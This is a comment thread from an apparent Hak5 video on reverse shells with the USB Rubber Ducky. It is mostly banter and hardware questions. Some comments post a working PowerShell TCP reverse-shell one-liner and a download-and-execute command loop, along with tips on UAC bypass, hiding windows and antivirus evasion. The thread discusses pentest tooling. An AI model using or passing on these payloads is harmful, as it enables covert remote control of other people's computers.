Just a tip for anyone that may run into this issue like I have: When you write Ducky code to run CMD (or whatever you choose to open with the RUN command) and simulate the 'ALT + Y' key combination to select the 'Yes' button on the UAC dialog prompt, it's a good idea to follow up on the next line with a 'BACKSPACE' keystroke in the chance you're deploying onto a user's machine that has his/her UAC turned off. Otherwise, if you don't account for UAC being disabled, your first line of code typed into the CMD window will be prefixed with a 'y' character leading off (which of course throws an error and renders the whole payload useless). Pressing backspace as the first key press on a machine that does have UAC enabled will effectively do nothing at all since there's nothing to delete. It's a win-win and you don't have to deal with the irony of your attack being thwarted by someone who has disabled a feature meant to make them safer. It's like leaving your front door open only to have a thief knock himself out cold by walking into the knife edge of the opened door. Haha >.
Mitch Maguny Awesome! Glad it helped. Just a note: Pressing CTRL + C is actually quicker and easier than pressing Left Arrow + Delete. But either one works ;)
Mitch Maguny It would literally read CTRL C (if you're talking about the ducky code format). Here's an example screenshot of what that section of code would look like: i.gyazo.com/a295f2c5e4c46ae1c57767e95e516c4f.png
I managed to get the script down to 258 characters. Everything was going smoothly until I remembered "Oh yeah, you have to invoke powershell in there as well." Back up to 269 we go. Failsauce. Anyway, here's the shortened script: nal f New-Object;$s=(f Net.Sockets.TCPClient(4294967295,8)).GetStream();[byte[]]$b=0..65535|%{0};while(($i=$s.Read($b,0,$b.Length))-ne0){;$d=(f Text.UTF8Encoding).GetString($b,0,$i);$t=([text.encoding]::UTF8).GetBytes((iex $d 2>&1));$s.Write($t,0,$t.Length)} converted variable names from 2 characters to 1 (10 characters) deleted unnecessary white spaces (2 characters) converted ip address to a 64 bit integer and removed the quotes( (o1*2^24)+(o2*2^16)+(o3*2^8)+(o4) ) (7 characters) moved to port 8 (3 characters) switched to utf-8 encoding (2 characters) created alias f for new-object (1 character) BTW: The character cap on the windows run box is actually only 259 characters.
Can't you just download the command to run? $output = ''; while($true) { $output = iex (New-Object Net.WebClient).DownloadString("0.0.0.0/get_command_to_run.php?o=$output") } get_command_to_run.php will promote the user for a command to run and then print it. then, powershell will receive that and run it. Then somehow send back the output as a parameter to the php script (I hope I did it ok, I don't know powershell) .
+mikrobx you can encrypt that with vigenére algorithm easily and send it trough the network, antivirus can mostly detect sha256 decompression header, vigenére uses only an or.
YES! In fact, I'm going to post some videos of it on my personal youtube page soon... That place was SO WEIRD. - Shannon (ruclips.net/user/shannonmorse)
when doing this the powershell window stays open, and when closed it closes the session. Is this normal, and if so, can we change the script of the powershell to change this?
Very good stuff. And the Powershell-script-download-based tactic you show here is a lot more useful, from a practical standpoint, than the Mr. Robot-featured Rubber Ducky attack that you made a vid on a few weeks ago. This doesn't require the logged-in user having admin privileges, and it gets you a shell (from which you can try to do anything you like, including trying to find a way to eventually elevate your privileges to admin and then dump credential hashes). A suggestion: it would be really neat to see a vid where you use a Powershell script along with Empire, Metasploit, or another tool to install a *persisting* backdoor that gets restarted each time a user logs in and periodically reaches back to your server on a schedule of your liking to create a reverse shell or get instructions. .
Iv'e searched the comments for anything pertaining towards my question but can't seem to find anything! So it seems that this method relies on two conditions being true 1. The user or victim must be logged in 2. The domain this victim is connected to isn't enforcing some sort of group policy (GPO is very common amongst any competent tech team) My question is how can one install netcat on the victim machine if the target does not have any sort of admin privileges for that particular user due to GPO.
`sudo python -m SimpleHTTPServer 80` serves the current directory (`pwd` so you'll need to `cd` first), alternative to the php command as most distros are likely to already have python installed
The only thing I see wrong with this is the problem with it not running as administrator. You'd need to have that same ~3 second delay to run powershell StartProcess powershell -verb RunAs then continue with downloading the PS script.
Just use the back doors factory, social engineering tools and host the reverse she'll payload. It would be a Meterpreter shell that bypasses Antivirus.
Only Darren, GenX and Boomer programmers no the pain of squeezing out bytes in your code to make it fit 😅 I love those days where you had to think about cycles and/or memory usage. Eventhough 64K was enormous!
Command Prompt has actually been around since Windows 2000 because Windows 2000 was the first version of Windows to be based on the NT kernel and not the win9x kernel. All win9x version's of Windows were essentially running on top of MS-DOS, and 2000 and newer were NOT based upon MS-DOS, that's why cmd.exe exists in those OS's.
ty .. using a Win32 API call to AttachConsole() + a WScript.Shell object ( see MSDN for docs on both ) with the Write method would allow you to exec a command stream more reliably and covertly ( unless that's what you're doing already ). If not, the problem you can run into is needing to keep the console focused. The upside is Powershell can instantiate shell objects and make Win32 API calls ;).
u can completely hide the CMD prompt from showing up by opening up a separate window using crtl+win+d and once the CMD is executed, u can bo back to the window and delete it... and since going back and deleting will only take like milliseconds... it won't be mostly noticible...
Nice! I did something similar with an arduino nano iot with a led screen to "hack" wifi passwords easily. I would connect it to usb and use it as a keyboard to get the current connected wifi, list the password with key clear and send it back through COM to be shown in the LCD. Just for the fun of seeing your friends face when you ask to connect to the wifi and instead of asking for the key you ask to connect that stuff full of dupont cables in a test board to the USB to get it XDDDDDD
Heya, I rly want to do this to prank my friend but I am scared I am going to damage my friends laptop. Is there a way where I can remove the reverse shell on his pc, if so can I do it remotely ?
OMG thanks to your shirt I just realized that the toor in toorcon is root spelled backwards. I'm ashamed I didn't figure that out sooner. it might also help to actually go or look more into it.
Faster and more intense. Put some rubber on it(^.-) (-.^) (^.^) On another note, how would you connect to the reverse shell? What would you define as your end point. Sending it directly to your own equipment at your house isint very sneeky, so if we think "bad hackers" here. Would you than use a "barrowed" credit card to connect to some encrypted GSM equipment paid with that card and forward the connection to yourself or what ideas comes to mind?
I've seen a number of videos on reverse shell. Could they be used to fix a computer with a software problem since you can see everything one it? Could they be used to modify a computer such as to install a working new operating system?
Of course not. The reverse shell is running as long as the box is connected to the internet and is constantly running the backdoor. It's not possible to install a new OS as you have to 1) go into bootloader 2) get onto the new OS and then install the OS into bootloader and drive partition. This process will involve rebooting, OS switching, to the point where you cannot use an internet-based reverse shell to do it, and the program will have to installed anew on the *nix OS or whatever OS you would like even if you tried to actually pull it off. That means you'd probably have to flash a new script for the *nix system. Long story short, it isn't going to work.
@@karlbergen6826 shutdown should work. chroot is a *nix operation, it's not (afaik) natively possible on windows but I also don't see the benefits of it -- what would be your goal?
I love the USB Ducky, But the only problem I have is the driver load time on a lot of machines, being a simple HID device, I didnt think it would have to search windows update for a driver and download it, please if their is a bypas to make the install faster let me know!
I'm glad to have found this channel since it is very good topics, good presentation and interesting to watch. Thanks sooo much! Reverse shells can be better because a program calling out usually has an easier time getting through a firewall than a program trying to call into a computer. That little php server command is *gold*. Thanks sooo much!
don't get me wrong, I love Hak5 but umm this is what we always have done. Not sure if there is something to be learned here... You guys want to learn some old school look at an old magazine called "2600". And CMD and DOS is sorta an emulated version of actual DOS on newer version of MS OS's. Shells still work as they always have no different sense 60's spool drive IBM systems. It's a conversation all on its own but really you need to just understand how C and Basic, not C++ or VB, work. Windows is not specific nor is Linux, it's all just custom GUI over a simpler on/off or on a non "L337" mind set, binary software basic structure. I hate leet or hacker thinking because those of us who know, or old schools, get that hacking is a conversational concept more then as it is thought of. Microsoft screwed conceptional thinking by making codeing seem complicated and OS shell design out to be more complex then it is. OS2Warp people, Unix... we need to look at not relying on GUI's. Why I feel bad for ranting is cause programs like HAK5 kinda help newbz get the concept I am taking about. Hopefully this makes sense. Sorry for the rant, don't mean to be a prick.
❤️😁 المشكله تاخذ وقت طويل 😁 احسن شي احسن من روبر دوكي الهندسه العكسيه باستخدام جافا و الفايربيز 😊 قريباً اكملها انشالله 😁 . ال روبردوكي يخوف المستخدم اغلب المستخدمين يخافون من نافذة الامليتور. صراحه صار 4 سنوات اتابع قناة هاك5 و هي من افضل مصادري على الانترنت و بعد قناة hak5 project 313 و بعد قناتين حلوات 😁❤️ am very thankful 🙏 to know you guys 😁❤️ from iraq
I bought the duck and with the taxes and the tax I spent € 100.00 fixed red led light, I looked on their help site and I didn't solve it, I asked them for help via email, but only one answer they gave me saying that I would have contacted the assistance service .... € ... 100.00 thrown away. thank you
Ok I’m using nc on. My macOS Catalina terminal using the command nc -l -p 8080 . I get the error no: missing port with option -l. Any ideas on what could be going wrong?
I need to compile a duckyscript txt file that I wrote originally for my USB Rubber Ducky. But now I need to find a way to run the script as an exe file locally. ¿How can I make this posible? ¿How can I compile the script to an exe file?
20-30 second diversion is nothing in an office environment, you never spilled a drink on the floor... oh i forgot i'm a diabetic, i may get very dizzy and fall down in a second... oh look i tripped and hit my head on a desk/chair none anyuse if you dont want to draw attention to yourself, but as you had to walk into an office and i cant think of one that does not have cctv in the entrance so your already seen etc
"Microsoft decided they needed to do something completely different, and thus powershell was born"... If only they had simply just adopted a POSIX shell, everyones lives would have been easier, and Microsoft would have had a lo more success with Windows.
Do like elie bursztein and have the usb get a reverse tcp meterpreter connection and you will have a prettier shell with clearer commands! Look up mal usb! But otherwise awesome stuff! 👍🤓
I'm pretty sure you're just joking, but if anyone is interested "faster" and "more intense" were directions George Lucas gave in the original star wars movie. He did it so much that the crew turned it into a running joke. I think they may have even made signs for Lucas, one saying "faster" and the other saying "more intense".
This is like the same thing I posted on there forum but way better lol mine just used the standard Net Cat executable in a zip file in a drop box extracted then ran with cmd via vbs to make it run invisibly. Any way nice job I didn't think this could have been done faster I honestly never thought about a powershell version netcat.
Does the usb duck have to be permanently in the usb socket of the second computer during the connection or is it enough to insert it for a while while the script is loaded?
If we use the faster way, it needs to download something from a website (in this video Darren's PHP server), which is a concern that already stated at the very beginning of the video isn't it? So if I understand correctly this means we can't get both advantage of high-injection-speed and high-success-chance right? Its a trade-off like, either 1)I sacrifice chance of success by having fast injection through downloading PS script, or 2) do this without downloading the PS script to have a higher chance, but with slower-injection.
Haha I always rep and tag you guys on social media for thousands and thousands to see 😊 I would scream in excitement if I ever won anything from you guys 😂
Just a tip for anyone that may run into this issue like I have: When you write Ducky code to run CMD (or whatever you choose to open with the RUN command) and simulate the 'ALT + Y' key combination to select the 'Yes' button on the UAC dialog prompt, it's a good idea to follow up on the next line with a 'BACKSPACE' keystroke in the chance you're deploying onto a user's machine that has his/her UAC turned off. Otherwise, if you don't account for UAC being disabled, your first line of code typed into the CMD window will be prefixed with a 'y' character leading off (which of course throws an error and renders the whole payload useless). Pressing backspace as the first key press on a machine that does have UAC enabled will effectively do nothing at all since there's nothing to delete. It's a win-win and you don't have to deal with the irony of your attack being thwarted by someone who has disabled a feature meant to make them safer. It's like leaving your front door open only to have a thief knock himself out cold by walking into the knife edge of the opened door. Haha >.
Chris Evans you legend i have been getting "y mode is not a recognised command" thanks for the info
Mitch Maguny Awesome! Glad it helped. Just a note: Pressing CTRL + C is actually quicker and easier than pressing Left Arrow + Delete. But either one works ;)
Chris Evans So the next line literally reads CTRL + C ?
Mitch Maguny It would literally read CTRL C (if you're talking about the ducky code format). Here's an example screenshot of what that section of code would look like: i.gyazo.com/a295f2c5e4c46ae1c57767e95e516c4f.png
Ok thanks for that i have only managed to get 2 scripts working so far.I have issues with the twin duck saving files to my drive.
You two ROCK. I love every one of your videos. Keep it up.
Thank you!
You are welcome. Any time I can help out.
That shirt is a must!
Disk OS......
What happened to dirty operating system
best blooper ever :)
I wish i had one -_-
just use some chinese arduino mirco for 10 $
the nsanamegenerator is down :C
1 sticker = +0.3 CPU cores
So this guy has ca. 9999999 CPUs? 😂🤘🏼
Lol😂
Dont' buy stickers :D Just download more RAM LOL. Or RGB 1 led +2 gpu and + 999999999 fps
@@kubakaktus_ big brain time
Skickar stickers
I can't help being distracted by the button presses to change cameras.
You made me realize it, can't stop paying attention to it now.
Lol mee to, I was noticing this 😁
but if he's shooting all this live with no post production editing.. mad props.
Same XD
Its so cool right!??!!
Always run your listener with( nc -lvnp 8080 ), so you know you got the incoming connection. It enables verbose mode.
Agree, thats how i do it too
Got the single stage payload down to a 256 char run command. \o/
Cool! Please share!
"These hacker stickers make it go faster" -Darren
Loooooool
I managed to get the script down to 258 characters. Everything was going smoothly until I remembered "Oh yeah, you have to invoke powershell in there as well." Back up to 269 we go. Failsauce.
Anyway, here's the shortened script:
nal f New-Object;$s=(f Net.Sockets.TCPClient(4294967295,8)).GetStream();[byte[]]$b=0..65535|%{0};while(($i=$s.Read($b,0,$b.Length))-ne0){;$d=(f Text.UTF8Encoding).GetString($b,0,$i);$t=([text.encoding]::UTF8).GetBytes((iex $d 2>&1));$s.Write($t,0,$t.Length)}
converted variable names from 2 characters to 1 (10 characters)
deleted unnecessary white spaces (2 characters)
converted ip address to a 64 bit integer and removed the quotes( (o1*2^24)+(o2*2^16)+(o3*2^8)+(o4) ) (7 characters)
moved to port 8 (3 characters)
switched to utf-8 encoding (2 characters)
created alias f for new-object (1 character)
BTW: The character cap on the windows run box is actually only 259 characters.
-Reverse shell in 3 seconds
-Video is 1331 seconds long
😑
r/theydidthemath
I don't think you'd want a 3 second video. Even a 30 s video would be terrible
you don't really want a 3 second video "-_-"
Can't you just download the command to run?
$output = ''; while($true) { $output = iex (New-Object Net.WebClient).DownloadString("0.0.0.0/get_command_to_run.php?o=$output") }
get_command_to_run.php will promote the user for a command to run and then print it. then, powershell will receive that and run it. Then somehow send back the output as a parameter to the php script (I hope I did it ok, I don't know powershell) .
i think the point is not doing things over network but the admin user actually creating the files 'themselves'.
Syntax looks about right.
+mikrobx you can encrypt that with vigenére algorithm easily and send it trough the network, antivirus can mostly detect sha256 decompression header, vigenére uses only an or.
Denver is at 5280 and that airport is a circus of madness
did you catch the crazy apocalypse mural in the concors...
YES! In fact, I'm going to post some videos of it on my personal youtube page soon... That place was SO WEIRD. - Shannon (ruclips.net/user/shannonmorse)
i made this 0.5 seconds
Kryštof Píštěk it really depends on target computer. I don't know about 0.5 seconds, but lowering the initial delay is possible.
0.1
0.0 hehehehehe jk
how?
Hahaha
when doing this the powershell window stays open, and when closed it closes the session. Is this normal, and if so, can we change the script of the powershell to change this?
I didn't know about the php -S thing. Neat!
I kinda wish HaK5 would sell the bare minimum Tablet/Portable PC, but make it plug n play style. Branch Out and Expand HaK5!
Very good stuff. And the Powershell-script-download-based tactic you show here is a lot more useful, from a practical standpoint, than the Mr. Robot-featured Rubber Ducky attack that you made a vid on a few weeks ago. This doesn't require the logged-in user having admin privileges, and it gets you a shell (from which you can try to do anything you like, including trying to find a way to eventually elevate your privileges to admin and then dump credential hashes). A suggestion: it would be really neat to see a vid where you use a Powershell script along with Empire, Metasploit, or another tool to install a *persisting* backdoor that gets restarted each time a user logs in and periodically reaches back to your server on a schedule of your liking to create a reverse shell or get instructions. .
FASTER AND MORE INTENSE!!! xD
That's what she said.
How to change the keyboard layout from Arduino Mini (Pro Micro) to QWERTZ ? have problems with german (QWERTZ) keyboard layouts :c
video title : How to Get a Reverse Shell in *3 Seconds* with the USB Rubber Ducky
video time : 22 minutes, 11 seconds.
me : BURH -_-
Iv'e searched the comments for anything pertaining towards my question but can't seem to find anything!
So it seems that this method relies on two conditions being true
1. The user or victim must be logged in
2. The domain this victim is connected to isn't enforcing some sort of group policy (GPO is very common amongst any competent tech team)
My question is how can one install netcat on the victim machine if the target does not have any sort of admin privileges for that particular user due to GPO.
`sudo python -m SimpleHTTPServer 80` serves the current directory (`pwd` so you'll need to `cd` first), alternative to the php command as most distros are likely to already have python installed
"python -m SimpleHTTPServer "
Shannon Morse is the best example of nominative determinism I have seen in quite a while!
Did this faster than the speed of light
No the light speed isn't a time measure stuped imagine being a remote access trojan
The only thing I see wrong with this is the problem with it not running as administrator. You'd need to have that same ~3 second delay to run
powershell StartProcess powershell -verb RunAs
then continue with downloading the PS script.
Anyone know where to get Darren's T-Shirt?
Just use the back doors factory, social engineering tools and host the reverse she'll payload. It would be a Meterpreter shell that bypasses Antivirus.
Only Darren, GenX and Boomer programmers no the pain of squeezing out bytes in your code to make it fit 😅
I love those days where you had to think about cycles and/or memory usage. Eventhough 64K was enormous!
You could create a new virtual desktop or workspace (I'm not sure how it's called in windows) to hide a window
How about just enabling remote desktop, new admin user and slowing in firewall. Done and no code for defender to hit on.
should i get a Rasbery pi 3 for kali linux?
TopGamingStudio any Pi will work, then again so will a USB jammed in a laptop with persistence
that's what she said
yes but i will be testing websites vulnerabilities and im just wondering will it be fast enough? to do anything
a persistence usb with Kali installed might be a better idea
MrX
Would still beat most of the rPi models...
I Wish i had a Rubber Ducky. BUT IT COSTS 50 BUCKS, Im... Broke...
Command Prompt has actually been around since Windows 2000 because Windows 2000 was the first version of Windows to be based on the NT kernel and not the win9x kernel. All win9x version's of Windows were essentially running on top of MS-DOS, and 2000 and newer were NOT based upon MS-DOS, that's why cmd.exe exists in those OS's.
if stickers make it faster, then I need a lot of them
Is this just casual flirting or are they going to get on with it?!
what linux distro are you using
ty .. using a Win32 API call to AttachConsole() + a WScript.Shell object ( see MSDN for docs on both ) with the Write method would allow you to exec a command stream more reliably and covertly ( unless that's what you're doing already ).
If not, the problem you can run into is needing to keep the console focused. The upside is Powershell can instantiate shell objects and make Win32 API calls ;).
when you want to buy a sticker for 2:50 but it costs 40$ shipping
is there a place to download the 20 second, first script they used at 5:00. i cant find it on their website/the rest of the internet
u can completely hide the CMD prompt from showing up by opening up a separate window using crtl+win+d and once the CMD is executed, u can bo back to the window and delete it... and since going back and deleting will only take like milliseconds... it won't be mostly noticible...
you guys rock....thanks for the tetra , turtle and ducky....helped change my life !
Nice! I did something similar with an arduino nano iot with a led screen to "hack" wifi passwords easily. I would connect it to usb and use it as a keyboard to get the current connected wifi, list the password with key clear and send it back through COM to be shown in the LCD.
Just for the fun of seeing your friends face when you ask to connect to the wifi and instead of asking for the key you ask to connect that stuff full of dupont cables in a test board to the USB to get it XDDDDDD
You forgot the illuminati contributions under dia
Heya, I rly want to do this to prank my friend but I am scared I am going to damage my friends laptop. Is there a way where I can remove the reverse shell on his pc, if so can I do it remotely ?
OMG thanks to your shirt I just realized that the toor in toorcon is root spelled backwards. I'm ashamed I didn't figure that out sooner. it might also help to actually go or look more into it.
If you want to go mobile with Netcat, on Android you can use the netcat binary that comes with Busybox (if it's installed, that is).
Powershell is just 4 scripting and programming languages in an overcoat. lol
Good stuff! That tree command output looks a lot like those tech support scams..... You're the one! ..Except you're missing the accent... Heh
just waiting for someone to type ont the r.ps1 of the staged payload cuz im lazy( it has beed 3 years and no one responded)
they talk bullsh*t all the time but talk sense for 3sec in the complete video
Faster and more intense.
Put some rubber on it(^.-) (-.^) (^.^)
On another note, how would you connect to the reverse shell? What would you define as your end point.
Sending it directly to your own equipment at your house isint very sneeky, so if we think "bad hackers" here. Would you
than use a "barrowed" credit card to connect to some encrypted GSM equipment paid with that card and forward the connection to yourself or what ideas comes to mind?
Lol just realized this video is from 5 years ago, I was wondering why he had a 2016 shirt
So once the command is run and terminal is open on windows system how do you make that either nt view able or make the power shell close?
I've seen a number of videos on reverse shell. Could they be used to fix a computer with a software problem since you can see everything one it? Could they be used to modify a computer such as to install a working new operating system?
Of course not. The reverse shell is running as long as the box is connected to the internet and is constantly running the backdoor. It's not possible to install a new OS as you have to 1) go into bootloader 2) get onto the new OS and then install the OS into bootloader and drive partition. This process will involve rebooting, OS switching, to the point where you cannot use an internet-based reverse shell to do it, and the program will have to installed anew on the *nix OS or whatever OS you would like even if you tried to actually pull it off. That means you'd probably have to flash a new script for the *nix system.
Long story short, it isn't going to work.
@@skuldug1250
Your comment is interesting. Question: Could the reverse shell order an attack computer to shutdown or do a changeroot?
@@karlbergen6826 shutdown should work. chroot is a *nix operation, it's not (afaik) natively possible on windows but I also don't see the benefits of it -- what would be your goal?
Hack5 look like wannabe hacker
I'm going to do this on my zip disk
Gut 😊
I love the USB Ducky, But the only problem I have is the driver load time on a lot of machines, being a simple HID device, I didnt think it would have to search windows update for a driver and download it, please if their is a bypas to make the install faster let me know!
If you make this a generic keyboard, the driver should already be there.
I am glad the wadsworth constant does not work on hak5 videos.
Awesome channel!!!
Keep it up!
And btw....
Y U NO USE VIM??? :P
Ull have to call the victime on phone and ask him to press yes on the popup
Why should you pre-install the setup when you need to take us through
@gain, thank you for all this information. yall always present the info in ways I can keep attention... thank U
What laptop are you using for linux?
#hak5 it has gotta be fiber, and all the servers.
Also how can i get access to hidden directories.
Ok, where did he get the shirt? I got to get one.
i dont think she knows whats happening
is shannon using a mini laptop? what is it
I'm glad to have found this channel since it is very good topics, good presentation and interesting to watch. Thanks sooo much!
Reverse shells can be better because a program calling out usually has an easier time getting through a firewall than a program trying to call into a computer.
That little php server command is *gold*. Thanks sooo much!
What notebook is darren using?
Looks like a Dell XPS 13
Looks like a Dell XPS 13
Not sure why people are saying "Looks like".....7:50 Either Darren is a troll or he named his laptop "xps13" because it is an XPS 13......
m sven because it looks like it
Gon Nespral I was being a little snarky....
wifi pineapple 2017 lol happy new year
don't get me wrong, I love Hak5 but umm this is what we always have done. Not sure if there is something to be learned here... You guys want to learn some old school look at an old magazine called "2600". And CMD and DOS is sorta an emulated version of actual DOS on newer version of MS OS's. Shells still work as they always have no different sense 60's spool drive IBM systems. It's a conversation all on its own but really you need to just understand how C and Basic, not C++ or VB, work. Windows is not specific nor is Linux, it's all just custom GUI over a simpler on/off or on a non "L337" mind set, binary software basic structure. I hate leet or hacker thinking because those of us who know, or old schools, get that hacking is a conversational concept more then as it is thought of. Microsoft screwed conceptional thinking by making codeing seem complicated and OS shell design out to be more complex then it is. OS2Warp people, Unix... we need to look at not relying on GUI's. Why I feel bad for ranting is cause programs like HAK5 kinda help newbz get the concept I am taking about. Hopefully this makes sense. Sorry for the rant, don't mean to be a prick.
❤️😁 المشكله تاخذ وقت طويل 😁
احسن شي احسن من روبر دوكي الهندسه العكسيه باستخدام جافا و الفايربيز 😊 قريباً اكملها انشالله 😁
. ال روبردوكي يخوف المستخدم اغلب المستخدمين يخافون من نافذة الامليتور.
صراحه صار 4 سنوات اتابع قناة هاك5 و هي من افضل مصادري على الانترنت و بعد قناة
hak5
project 313
و بعد قناتين حلوات 😁❤️
am very thankful 🙏 to know you guys 😁❤️
from iraq
I bought the duck and with the taxes and the tax I spent € 100.00 fixed red led light, I looked on their help site and I didn't solve it, I asked them for help via email, but only one answer they gave me saying that I would have contacted the assistance service .... € ... 100.00 thrown away. thank you
Ok I’m using nc on. My macOS Catalina terminal using the command nc -l -p 8080 . I get the error no: missing port with option -l. Any ideas on what could be going wrong?
I need to compile a duckyscript txt file that I wrote originally for my USB Rubber Ducky.
But now I need to find a way to run the script as an exe file locally.
¿How can I make this posible? ¿How can I compile the script to an exe file?
For everybody look whid cactus cheaper and better than rubber ducky!!! and P4wnP1 too is amazing!!!
20-30 second diversion is nothing in an office environment, you never spilled a drink on the floor... oh i forgot i'm a diabetic, i may get very dizzy and fall down in a second... oh look i tripped and hit my head on a desk/chair
none anyuse if you dont want to draw attention to yourself, but as you had to walk into an office and i cant think of one that does not have cctv in the entrance so your already seen etc
"Microsoft decided they needed to do something completely different, and thus powershell was born"... If only they had simply just adopted a POSIX shell, everyones lives would have been easier, and Microsoft would have had a lo more success with Windows.
Do like elie bursztein and have the usb get a reverse tcp meterpreter connection and you will have a prettier shell with clearer commands! Look up mal usb! But otherwise awesome stuff! 👍🤓
I dont Have Rubber Ducky. I build Hid device using Aurdino UNO .... hehehehe
I'm pretty sure you're just joking, but if anyone is interested "faster" and "more intense" were directions George Lucas gave in the original star wars movie. He did it so much that the crew turned it into a running joke. I think they may have even made signs for Lucas, one saying "faster" and the other saying "more intense".
This is like the same thing I posted on there forum but way better lol mine just used the standard Net Cat executable in a zip file in a drop box extracted then ran with cmd via vbs to make it run invisibly. Any way nice job I didn't think this could have been done faster I honestly never thought about a powershell version netcat.
does it still works when the cmd is closed? Because the victim might notice and just exit immidiately
If so then it's Completely Useless.
Hey does anyone still have the script as its removed from their page.
By the way it was really interesting and juicy knowledge
Does the usb duck have to be permanently in the usb socket of the second computer during the connection or is it enough to insert it for a while while the script is loaded?
so, no usb no hack? what can we do then to prevent "internet "hacks""? & don't tell me about VPN...
the whole moving command prompt/ windows off screen is annoying. Although shrinking the restore window to nothingness is also urgh.
If we use the faster way, it needs to download something from a website (in this video Darren's PHP server), which is a concern that already stated at the very beginning of the video isn't it?
So if I understand correctly this means we can't get both advantage of high-injection-speed and high-success-chance right? Its a trade-off like, either 1)I sacrifice chance of success by having fast injection through downloading PS script, or 2) do this without downloading the PS script to have a higher chance, but with slower-injection.
Thoughts : jpeg with embedded nano script utilizing the single stage reverse power shell script?
Aren't these power shell scripts mitigated by a good group policy that prevents users from running power shell let alone that downloadstring command
Haha I always rep and tag you guys on social media for thousands and thousands to see 😊 I would scream in excitement if I ever won anything from you guys 😂
Question: How does this work if powershell is in Contrained Language mode?
Who makes his "hacker box"
Faster and more intense? What kind of Movies are you thinking about exactly? Hmm?